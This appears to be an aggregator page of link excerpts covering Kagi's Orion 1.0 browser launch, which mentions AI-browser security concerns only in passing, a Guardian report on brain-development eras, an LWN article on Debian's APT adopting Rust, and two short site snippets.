Security re­searchers have al­ready doc­u­mented se­ri­ous is­sues in early AI browsers and agentic” browser fea­tures:

* Hidden or un­doc­u­mented APIs that al­lowed em­bed­ded AI com­po­nents to ex­e­cute ar­bi­trary lo­cal com­mands on users’ de­vices.

* Prompt‑injection at­tacks that trick AI agents into ig­nor­ing safety rules, vis­it­ing ma­li­cious sites, or leak­ing sen­si­tive in­for­ma­tion be­yond what tra­di­tional browser sand­boxes were de­signed to pro­tect.

* Broader con­cerns that some im­ple­men­ta­tions are ef­fec­tively lighting every­thing on fire” by ex­pand­ing the browser’s at­tack sur­face and data flows in ways users don’t fully un­der­stand.

* We are not against AI, and we are con­scious of its lim­i­ta­tions. We al­ready in­te­grate with AI‑powered ser­vices wher­ever it makes func­tional sense and will con­tinue to ex­pand those ca­pa­bil­i­ties.

* We are against rush­ing in­se­cure, al­ways‑on agents into the browser core. Your browser should be a se­cure gate­way, not an un­vet­ted co‑pi­lot wired into every­thing you do.

* Orion ships with no built‑in AI code in its core.

* We fo­cus on pro­vid­ing a clean, pre­dictable en­vi­ron­ment, es­pe­cially for en­ter­prises and pri­vacy‑con­scious pro­fes­sion­als.

* Orion is de­signed to con­nect seam­lessly to the AI tools you choose — soon in­clud­ing Kagi’s in­tel­li­gent fea­tures — while keep­ing a clear sep­a­ra­tion be­tween your browser and any ex­ter­nal AI agents.

As AI ma­tures and se­cu­rity mod­els im­prove, we’ll con­tinue to eval­u­ate thought­ful, user‑con­trolled ways to bring AI into your work­flow with­out com­pro­mis­ing safety, pri­vacy or user choice.

We de­signed Orion to bridge the gap be­tween sim­plic­ity and power. Out of the box, it’s a clean, in­tu­itive browser for any­one. Under the hood, it’s a deep tool­box for peo­ple who live in their browser all day.

Some of the unique fea­tures you’ll find in Orion 1.0:

* Focus Mode: Instantly trans­form any web­site into a dis­trac­tion‑free web app. Perfect for doc­u­men­ta­tion, writ­ing, or web apps you run all day.

* Link Preview: Peek at con­tent from any app — email, notes, chat — with­out fully com­mit­ting to open­ing a tab, keep­ing your work­space tidy.

* Mini Toolbar, Overflow Menu, and Page Tweak: Fine‑tune each page’s ap­pear­ance and con­trols, so the web adapts to you, not the other way around.

* Profiles as Apps: Isolate your work, per­sonal, and hobby brows­ing into com­pletely sep­a­rate pro­files, each with its own ex­ten­sions, cook­ies, and set­tings.

For power users, we’ve added gran­u­lar op­tions through­out the browser. These are there when you want them, and out of your way when you don’t.

Orion 1.0 also re­flects six years of feed­back from early adopters. Many in­vis­i­ble im­prove­ments — tab sta­bil­ity, mem­ory be­hav­ior, com­plex web app com­pat­i­bil­ity — are a di­rect re­sult of peo­ple push­ing Orion hard in their daily work­flows and telling us what broke.

With this re­lease, we are in­tro­duc­ing our new sig­na­ture: Browse Beyond ✴︎.

We orig­i­nally started with the browser name Kagi.’ On February 3, 2020, Vlad sug­gested a short­list for re­brand­ing: Comet, Core, Blaze, and Orion. We chose Orion not just for the name it­self, but be­cause it per­fectly cap­tured our drive for ex­plo­ration and cu­rios­ity. It was a nat­ural fit that set the stage for every­thing that fol­lowed.

You’ll see this re­flected in our re­freshed vi­sual iden­tity:

* A re­fined logo that now uses the same type­face as Kagi, cre­at­ing a clear vi­sual bond be­tween our browser and our search en­gine.

Orion is part of the broader Kagi ecosys­tem, united by a sim­ple idea: the in­ter­net should be built for peo­ple, not ad­ver­tis­ers or any other third par­ties.

Orion is built by a team of just six de­vel­op­ers.

To put that in per­spec­tive:

* That’s roughly 10% of the size of the small” browser teams at larger com­pa­nies.

* And a round­ing er­ror com­pared to the teams be­hind Chrome or Edge.

Yet, the im­pact is real: over 1 mil­lion down­loads to date, and a ded­i­cated com­mu­nity of 2480 paid sub­scribers who make this in­de­pen­dence pos­si­ble.

For the first two years, de­vel­op­ment was car­ried out by a sin­gle de­vel­oper. Today, we are a tight knit group op­er­at­ing close to our users. We lis­ten, de­bate, and im­ple­ment fixes pro­posed di­rectly by our com­mu­nity on OrionFeedback.org.

This is our only source of de­ci­sion mak­ing, rather than any us­age an­a­lyt­ics or pat­terns, be­cause re­mem­ber, Orion is zero-teleme­try!

This small team ap­proach lets us move quickly, stay fo­cused, and avoid the bloat or hype that of­ten comes with scale.

Orion is free for every­one.

Every user also re­ceives 200 free Kagi searches, with no ac­count or sign‑up re­quired. It’s our way of in­tro­duc­ing you to fast, ad‑free, pri­vacy‑re­spect­ing search from day one.

But we are also 100% self‑funded. We don’t sell your data and we don’t take money from ad­ver­tis­ers, which means we rely di­rectly on our users to sus­tain the pro­ject.

There are three ways to con­tribute to Orion’s fu­ture:

* Tip Jar (from the app): A sim­ple way to say thank you” with­out any com­mit­ment.

Supporters (via sub­scrip­tion or life­time pur­chase) un­lock a set of Orion+ perks avail­able to­day, in­clud­ing:

* Floating win­dows: Keep a video or win­dow on top of other apps.

* Early ac­cess to new, sup­porter‑ex­clu­sive fea­tures we’re al­ready build­ing for next year.

By sup­port­ing Orion, you’re not just fund­ing a browser — you are co‑fund­ing a bet­ter web with hu­mans at the cen­ter.

Orion 1.0 is just the be­gin­ning. Our goal is sim­ple: Browse Beyond, every­where.

* Orion for ma­cOS

Our flag­ship browser, six years in the mak­ing. Built na­tively for Mac, with per­for­mance and de­tail that only come from liv­ing on the plat­form for a long time. Download it now.

* Orion for iOS and iPa­dOS

Trusted daily by users who want fea­tures no other mo­bile browser of­fers. Native iOS per­for­mance with ca­pa­bil­i­ties that re­de­fine what’s pos­si­ble on mo­bile. Download it now.

* Orion for Linux (Alpha)

Currently in al­pha for users who value choice and in­de­pen­dence. Native Linux per­for­mance, with the same pri­vacy‑first ap­proach as on ma­cOS.

Sign up for our newslet­ter to fol­low de­vel­op­ment and join the early test­ing wave.

* Orion for Windows (in de­vel­op­ment)

We have of­fi­cially started de­vel­op­ment on Orion for Windows, with a tar­get re­lease sched­uled for late 2026. Our goal is full par­ity with Orion 1.0 for ma­cOS, in­clud­ing syn­chro­nized pro­files and Orion+ ben­e­fits across plat­forms. Sign up for our newslet­ter to fol­low de­vel­op­ment and join the early test­ing wave.

Synchronization will work seam­lessly across de­vices, so your brows­ing ex­pe­ri­ence fol­lows you, not the other way around.

From early testers to pri­vacy ad­vo­cates and power users, Orion has grown through the voices of its com­mu­nity.

We’ll con­tinue to sur­face com­mu­nity sto­ries and feed­back as Orion evolves. If you share your ex­pe­ri­ence pub­licly, there’s a good chance we’ll see it.

Hitting v1.0 is a big mile­stone, but we’re just get­ting started.

Over the next year, our roadmap is densely packed with:

* Further im­prove­ments to sta­bil­ity and com­plex web app per­for­mance.

* New Orion+ fea­tures that push what a browser can do while keep­ing it sim­ple for every­one else.

* Tighter in­te­gra­tions with Kagi’s in­tel­li­gent tools — al­ways un­der your con­trol, never forced into your work­flow.

We’re also work­ing on ex­pand­ing and im­prov­ing our web­site to bet­ter show­case every­thing Orion can do, in­clud­ing bet­ter doc­u­men­ta­tion and on­board­ing for teams that want to stan­dard­ize on Orion.

Meanwhile, fol­low our X ac­count where we’ll be drop­ping lit­tle free­bies on the reg­u­lar (and don’t worry, we’ll be post­ing these else­where on so­cials as well!)

Thank you for choos­ing to Browse Beyond with us.

...

Read the original on blog.kagi.com »

7 240 shares, 37 trendiness

Brain has five ‘eras’, scientists say – with adult mode not starting until early 30s

Scientists have iden­ti­fied five ma­jor epochs” of hu­man brain de­vel­op­ment in one of the most com­pre­hen­sive stud­ies to date of how neural wiring changes from in­fancy to old age.

The study, based on the brain scans of nearly 4,000 peo­ple aged un­der one to 90, mapped neural con­nec­tions and how they evolve dur­ing our lives. This re­vealed five broad phases, split up by four piv­otal turning points” in which brain or­gan­i­sa­tion moves on to a dif­fer­ent tra­jec­tory, at around the ages of nine, 32, 66 and 83 years.

Looking back, many of us feel our lives have been char­ac­terised by dif­fer­ent phases. It turns out that brains also go through these eras,” said Prof Duncan Astle, a re­searcher in neu­roin­for­mat­ics at Cambridge University and se­nior au­thor of the study.

Understanding that the brain’s struc­tural jour­ney is not a ques­tion of steady pro­gres­sion, but rather one of a few ma­jor turn­ing points, will help us iden­tify when and how its wiring is vul­ner­a­ble to dis­rup­tion.”

The child­hood pe­riod of de­vel­op­ment was found to oc­cur be­tween birth un­til the age of nine, when it tran­si­tions to the ado­les­cent phase — an era that lasts up to the age of 32, on av­er­age.

In a per­son’s early 30s the brain’s neural wiring shifts into adult mode — the longest era, last­ing more than three decades. A third turn­ing point around the age of 66 marks the start of an early age­ing” phase of brain ar­chi­tec­ture. Finally, the late age­ing” brain takes shape at around 83 years old.

The sci­en­tists quan­ti­fied brain or­gan­i­sa­tion us­ing 12 dif­fer­ent mea­sures, in­clud­ing the ef­fi­ciency of the wiring, how com­part­men­talised it is and whether the brain re­lies heav­ily on cen­tral hubs or has a more dif­fuse con­nec­tiv­ity net­work.

From in­fancy through child­hood, our brains are de­fined by network con­sol­i­da­tion”, as the wealth of synapses — the con­nec­tors be­tween neu­rons — in a baby’s brain are whit­tled down, with the more ac­tive ones sur­viv­ing. During this pe­riod, the study found, the ef­fi­ciency of the brain’s wiring de­creases.

Meanwhile, grey and white mat­ter grow rapidly in vol­ume, so that cor­ti­cal thick­ness — the dis­tance be­tween outer grey mat­ter and in­ner white mat­ter — reaches a peak, and cor­ti­cal fold­ing, the char­ac­ter­is­tic ridges on the outer brain, sta­bilises.

In the sec­ond epoch” of the brain, the ado­les­cence era, white mat­ter con­tin­ues to grow in vol­ume, so or­gan­i­sa­tion of the brain’s com­mu­ni­ca­tions net­works is in­creas­ingly re­fined. This era is de­fined by steadily in­creas­ing ef­fi­ciency of con­nec­tions across the whole brain, which is re­lated to en­hanced cog­ni­tive per­for­mance. The epochs were de­fined by the brain re­main­ing on a con­stant trend of de­vel­op­ment over a sus­tained pe­riod, rather than stay­ing in a fixed state through­out.

We’re def­i­nitely not say­ing that peo­ple in their late 20s are go­ing to be act­ing like teenagers, or even that their brain looks like that of a teenager,” said Alexa Mousley, who led the re­search. It’s re­ally the pat­tern of change.”

She added that the find­ings could give in­sights into risk fac­tors for men­tal health dis­or­ders, which most fre­quently emerge dur­ing the ado­les­cent pe­riod.

At around the age of 32 the strongest over­all shift in tra­jec­tory is seen. Life events such as par­ent­hood may play a role in some of the changes seen, al­though the re­search did not ex­plic­itly test this. We know that women who give birth, their brain changes af­ter­wards,” said Mousley. It’s rea­son­able to as­sume that there could be a re­la­tion­ship be­tween these mile­stones and what’s hap­pen­ing in the brain.”

From 32 years, the brain ar­chi­tec­ture ap­pears to sta­bilise com­pared with pre­vi­ous phases, cor­re­spond­ing with a plateau in in­tel­li­gence and per­son­al­ity” based on other stud­ies. Brain re­gions also be­come more com­part­men­talised.

The fi­nal two turn­ing points were de­fined by de­creases in brain con­nec­tiv­ity, which were be­lieved to be re­lated to age­ing and de­gen­er­a­tion of white mat­ter in the brain.

...

Read the original on www.theguardian.com »

8 224 shares, 26 trendiness

APT Rust requirement raises questions

The fol­low­ing sub­scrip­tion-only con­tent has been made avail­able to you by an LWN sub­scriber. Thousands of sub­scribers de­pend on LWN for the best news from the Linux and free soft­ware com­mu­ni­ties. If you en­joy this ar­ti­cle, please con­sider sub­scrib­ing to LWN. Thank you for vis­it­ing LWN.net!

It is rarely news­wor­thy when a pro­ject or pack­age picks up a new de­pen­dency. However, changes in a core tool like Debian’s Advanced Package

Tool (APT) can have far-reach­ing ef­fects. For ex­am­ple, Julian Andres Klode’s de­c­la­ra­tion

that APT would re­quire Rust in May 2026 means that a few of Debian’s un­of­fi­cial ports must ei­ther ac­quire a work­ing Rust tool­chain or de­pend on an old ver­sion of APT. This has raised sev­eral ques­tions within the pro­ject, par­tic­u­larly about the abil­ity of a sin­gle main­tainer to make changes that have wide­spread im­pact.

On October 31, Klode sent an an­nounce­ment to the de­bian-de­vel mail­ing list that he in­tended to in­tro­duce Rust de­pen­den­cies and code into APT as soon as May 2026:

This ex­tends at first to the Rust com­piler and stan­dard li­brary, and the Sequoia ecosys­tem.

In par­tic­u­lar, our code to parse .deb, .ar, .tar, and the HTTP sig­na­ture ver­i­fi­ca­tion code would strongly ben­e­fit from mem­ory safe lan­guages and a stronger ap­proach to unit test­ing.

If you main­tain a port with­out a work­ing Rust tool­chain, please en­sure it has one within the next 6 months, or sun­set the port.

Klode added this was nec­es­sary so that the pro­ject as a whole could move for­ward, rely on mod­ern tech­nolo­gies, and not be held back by

try­ing to shoe­horn mod­ern soft­ware on retro com­put­ing

de­vices”. Some Debian de­vel­op­ers have wel­comed the news. Paul Tagliamonte ac­knowl­edged

that it would im­pact un­of­fi­cial Debian ports but called the push to­ward Rust ”.

However, John Paul Adrian Glaubitz com­plained

that Klode’s word­ing was un­pleas­ant and that the ap­proach was con­fronta­tional. In an­other

mes­sage, he ex­plained that he was not against adop­tion of Rust; he had worked on en­abling Rust on many of the Debian ar­chi­tec­tures and helped to fix ar­chi­tec­ture-spe­cific bugs in the Rust tool­chain as well as LLVM up­stream. However, the mes­sage strongly sug­gested there was no room for a change in plan: Klode had ended his mes­sage with ”, which in­vited no fur­ther dis­cus­sion. Glaubitz was one of a few Debian de­vel­op­ers who ex­pressed dis­com­fort with Klode’s com­mu­ni­ca­tion style in the mes­sage.

Klode noted, briefly, that Rust was al­ready a hard re­quire­ment for all Debian re­lease ar­chi­tec­tures and ports, ex­cept for Alpha (alpha), Motorola 680x0 (m68k),

PA-RISC (hppa), and

SuperH (sh4), be­cause of APTs use of the Sequoia-PGP

pro­jec­t’s tool to ver­ify OpenPGP

sig­na­tures. APT falls back to us­ing the GNU Privacy Guard sig­na­ture-ver­i­fi­ca­tion tool, , on ports that do not have a Rust com­piler. By de­pend­ing di­rectly on Rust, though, APT it­self would not be avail­able on ports with­out a Rust com­piler. LWN re­cently

cov­ered the state of Linux ar­chi­tec­ture sup­port, and the sta­tus of Rust sup­port for each one.

None of the ports listed by Klode are among those of­fi­cially

sup­ported by Debian to­day, or tar­geted for sup­port in Debian 14 (“forky”). The sh4 port has never been of­fi­cially sup­ported, and none of the other ports have been sup­ported since Debian 6.0. The ac­tual im­pact on the ports lack­ing Rust is also less dra­matic than it sounded at first. Glaubitz as­sured

Antoni Boucher that ”, but phras­ing it that way gets more at­ten­tion in the

news”. Boucher is the main­tainer of , a GCC

ahead-of-time code gen­er­a­tor for Rust. Nothing, Glaubitz said, stops ports from us­ing a non-Rust ver­sion of APT un­til Boucher and oth­ers man­age to boot­strap Rust for those ports.

David Kalnischkies, who is also a ma­jor

con­trib­u­tor to APT, sug­gested

that if the goal is to re­duce bugs, it would be bet­ter to re­move the code that is used to parse the .deb, .ar, and .tar for­mats that Klode men­tioned from APT en­tirely. It is only needed for two tools,

and , he said, and the only ” of

was by Klode’s em­ployer, Canonical, for its Launchpad soft­ware-col­lab­o­ra­tion plat­form. If those were taken out of the main APT code base, then it would not mat­ter whether they were writ­ten in Rust, Python, or an­other lan­guage, since the tools are not di­rectly nec­es­sary for any given port.

Kalnischkies also ques­tioned the claim that Rust was nec­es­sary to achieve the stronger ap­proach to unit test­ing that Klode men­tioned:

You can cer­tainly do unit tests in C++, we do. The main prob­lem is that some­one has to write those tests. Like docs.

Your new solver e.g. has none (apart from our pre­ex­ist­ing in­te­gra­tion tests). You don’t se­ri­ously claim that is be­cause of C++ ? If you don’t like GoogleTest, which is what we cur­rently have, I could sug­gest doctest (as I did in pre­vi­ous in­stall­ments). Plenty other frame­works ex­ist with sim­i­lar or dif­fer­ent styles.

Klode has not re­sponded to those com­ments yet, which is a bit un­for­tu­nate given the fact that in­tro­duc­ing hard de­pen­den­cies on Rust has an im­pact be­yond his own work on APT. It may well be that he has good an­swers to the ques­tions, but it can also give the im­pres­sion that Klode is sim­ply em­brac­ing a trend to­ward Rust. He is in­volved

in the Ubuntu work to mi­grate from GNU Coreutils to the Rust-based uu­tils. The rea­sons given for that work, again, are around mod­ern­iza­tion and bet­ter se­cu­rity—but se­cu­rity is not au­to­mat­i­cally guar­an­teed sim­ply by switch­ing to Rust, and there are a num­ber of other con­sid­er­a­tions.

For ex­am­ple, Adrian Bunk pointed

out that there are a num­ber of Debian teams, as well as tool­ing, that will be im­pacted by writ­ing some of APT in Rust. The re­lease notes for Debian 13 (“trixie”) men­tion

that Debian’s in­fra­struc­ture currently has prob­lems with

re­build­ing pack­ages of types that sys­tem­at­i­cally use sta­tic

link­ing”, such as those with code writ­ten in Go and Rust. Thus, these pack­ages will be

cov­ered by lim­ited se­cu­rity sup­port un­til the in­fra­struc­ture is

im­proved to deal with them main­tain­ably”. Limited se­cu­rity sup­port means that up­dates to Rust li­braries are likely to only be re­leased when Debian pub­lishes a point re­lease, which hap­pens about every two months. The se­cu­rity team has specif­i­cally

stated that is fully sup­ported, but there are still out­stand­ing prob­lems.

Due to the sta­tic-link­ing is­sue, any time one of s de­pen­den­cies, cur­rently more than 40 Rust crates, have to be re­built due to a se­cu­rity is­sue, (at least po­ten­tially) also needs to be re­built. There are also dif­fi­cul­ties in track­ing CVEs for all of its de­pen­den­cies, and un­der­stand­ing when a se­cu­rity vul­ner­a­bil­ity in a Rust crate may re­quire up­dat­ing a Rust pro­gram that de­pends on it.

Fabian Grünbichler, a main­tainer of Debian’s Rust tool­chain, listed

sev­eral out­stand­ing prob­lems Debian has with deal­ing with Rust pack­ages. One of the largest is the need for a con­sis­tent Debian pol­icy for de­clar­ing sta­t­i­cally linked li­braries. In 2022, Guillem Jover added a con­trol field for Debian pack­ages called Static-Built-Using (SBU), which would list the source pack­ages used to build a bi­nary pack­age. This would in­di­cate when a bi­nary pack­age needs to be re­built due to an up­date in an­other source pack­age. For ex­am­ple, de­pends on more than 40 Rust crates that are pack­aged for Debian. Without de­clar­ing the SBUs, it may not be clear if needs to be up­dated when one of its de­pen­den­cies is up­dated. Debian has been work­ing on a pol­icy

re­quire­ment for SBU since April 2024, but it is not yet fin­ished or adopted.

The dis­cus­sion sparked by Grünbichler makes clear that most of Debian’s Rust-related prob­lems are in the process of be­ing solved. However, there’s no ev­i­dence that Klode ex­plored the prob­lems be­fore de­clar­ing that APT would de­pend on Rust, or even asked is this a rea­son­able time frame to in­tro­duce this de­pen­dency?”

Debian’s tagline, or at least one of its taglines, is the uni­ver­sal op­er­at­ing sys­tem”, mean­ing that the pro­ject aims to run on a wide va­ri­ety of hard­ware (old and new) and be us­able on the desk­top, server, IoT de­vices, and more. The Why Debian” page lists a num­ber of rea­sons users and de­vel­op­ers should choose the dis­tri­b­u­tion: mul­ti­ple hard­ware

ar­chi­tec­tures, long-term

sup­port, and its de­mo­c­ra­tic gov­er­nance

struc­ture are just a few of the ar­gu­ments it puts for­ward in fa­vor of Debian. It also notes that Debian can­not be con­trolled by a

sin­gle com­pany”. A sin­gle de­vel­oper em­ployed by a com­pany to work on Debian tools push­ing a change that seems ben­e­fi­cial to that com­pany, with­out dis­cus­sion or de­bate, that im­pacts mul­ti­ple hard­ware ar­chi­tec­tures and that re­quires other vol­un­teers to do un­planned work or meet an ar­ti­fi­cial dead­line seems to go against many of the pro­jec­t’s stated val­ues.

Debian, of course, does have checks and bal­ances that could be em­ployed if other Debian de­vel­op­ers feel it nec­es­sary. Someone could, for ex­am­ple, ap­peal to Debian’s Technical Committee, or spon­sor a gen­eral res­o­lu­tion to over­ride a de­vel­oper if they can­not be per­suaded by dis­cus­sion alone. That hap­pened re­cently when the com­mit­tee re­quired sys­temd

main­tain­ers to pro­vide the di­rec­tory until

a sat­is­fac­tory mi­gra­tion of im­pacted soft­ware has oc­curred and Policy

up­dated ac­cord­ingly”.

However, it also seems fair to point out that Debian can move slowly, even glacially, at times. APT added

sup­port for the DEB822

for­mat for its source in­for­ma­tion lists in 2015. Despite APT sup­port­ing that for­mat for years, Klode faced re­sis­tance in 2021, when he pushed

for Debian to move to the new for­mat ahead of the Debian 12 (“bookworm”) re­lease in 2021, but was un­suc­cess­ful. It is now the de­fault for trixie with the move to APT 3.0, though APT will con­tinue to sup­port the old for­mat for years to come.

The fact is, re­gard­less of what Klode does with APT, more and more free soft­ware is be­ing writ­ten (or rewrit­ten) in Rust. Making it eas­ier to sup­port that soft­ware when it is pack­aged for Debian is to every­one’s ben­e­fit. Perhaps the pro­ject needs some de­vel­op­ers who will be ag­gres­sive about push­ing the pro­ject to move more quickly in im­prov­ing its sup­port for Rust. However, what is re­ally needed is more de­vel­op­ers lend­ing a hand to do the work that is needed to sup­port Rust in Debian and else­where, such as . It does not seem in keep­ing with Debian’s com­mu­nity fo­cus for a sin­gle de­vel­oper to sim­ply de­clare de­pen­den­cies that other vol­un­teers will have to scram­ble to sup­port.

...

Read the original on lwn.net »

9 202 shares, 8 trendiness

OCR Arena

Upload an im­age to start an anony­mous OCR bat­tle­Need a doc­u­ment? Upload an im­age to start an anony­mous OCR bat­tle­Need a doc­u­ment?

...

Read the original on www.ocrarena.ai »

10 198 shares, 4 trendiness

You're using a tool with a too-generic User-Agent

You’re prob­a­bly read­ing this page be­cause you’ve at­tempted to ac­cess some part of my blog (Wandering

Thoughts) or CSpace, the wiki thing it’s part of. Unfortunately what­ever you’re us­ing to do so has a HTTP User-Agent header value that is too generic or oth­er­wise ex­ces­sively sus­pi­cious. Unfortunately, as of early 2025 there’s a plague of high vol­ume crawlers (apparently in part to gather data for LLM train­ing) that be­have like this. To re­duce the load on Wandering Thoughts I’m ex­per­i­ment­ing with (attempting to) block all of them, and you’ve run into this.

All HTTP User-Agent head­ers should clearly iden­tify what they are, and for non-browser user agents, they should iden­tify not just the soft­ware in­volved but also who specif­i­cally is us­ing that soft­ware. An ex­tremely generic value such as Go-http-client/1.1” is not some­thing that I con­sider ac­cept­able any more.

...

Read the original on utcc.utoronto.ca »

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.